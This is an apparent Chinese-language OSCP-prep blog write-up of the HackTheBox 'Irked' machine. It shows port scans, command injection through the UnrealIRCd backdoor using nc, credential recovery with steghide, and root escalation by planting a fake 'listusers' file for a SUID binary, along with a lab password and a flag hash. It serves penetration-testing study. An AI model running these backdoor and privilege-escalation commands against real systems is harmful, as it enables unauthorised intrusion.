OSCP备考_0x12_HackThBox靶机_Linux_irked

Ethan医生6天前靶场18

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.213.7 (扫描TCP)

image.png



nmap -sU --top-ports 100 10.129.213.7 (扫描UDP)


image.png



UnrealIRCd

    查看是否有后门漏洞

    nmap -p 6667,6697,8067,65534 --script irc-unrealircd-backdoor 10.129.213.7 

image.png



    echo -e "AB;id\n" | nc 10.129.213.7  8067

命令解释

  • echo -e "AB;id\n":生成一个字符串,其中 AB; 是触发后门的特殊前缀,id 是要执行的命令

  • |:管道符,将前一个命令的输出作为后一个命令的输入

  • nc 10.10.10.117 8067:使用 netcat 连接到目标 IP 的 8067 端口

没有回显,可能就是无法回显,尝试在没有回显的情况下验证漏洞

echo -e "AB; ping -c 1 10.10.16.26\n" | nc 10.10.10.117 8067

本地监听

tcpdump -ni tun0 icmp


image.png

image.png

到home底下有djmardov 没法直接查看user.txt

image.png

经过一连串搜索发现Documents底下有.backup挡案

cat .backup

Super elite steg backup pw

UPupDOWNdownLRlrBAbaSSss


image.png

steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss 

image.png

image.png

Kab6h+m+bbp2J:HG

image.png

提权发现suid有

/usr/bin/viewuser 可疑文件

image.png

发现没找到SH

echo sh > /tmp/listusers 直接写入

image.png




b52f698299c54635b5dae46a6f0efa5b

标签: OSCP

相关文章

OSCP备考_0x07_Vulnhub靶机_Tr0ll: 2

OSCP备考_0x07_Vulnhub靶机_Tr0ll: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-2,107/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x26_HackThBox靶机_Linux_magic

OSCP备考_0x26_HackThBox靶机_Linux_magic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.125 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x04_HackThBox靶机_Linux_cronos

OSCP备考_0x04_HackThBox靶机_Linux_cronos

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

OSCP备考_0x14_Vulnhub靶机_Raven: 2

OSCP备考_0x14_Vulnhub靶机_Raven: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。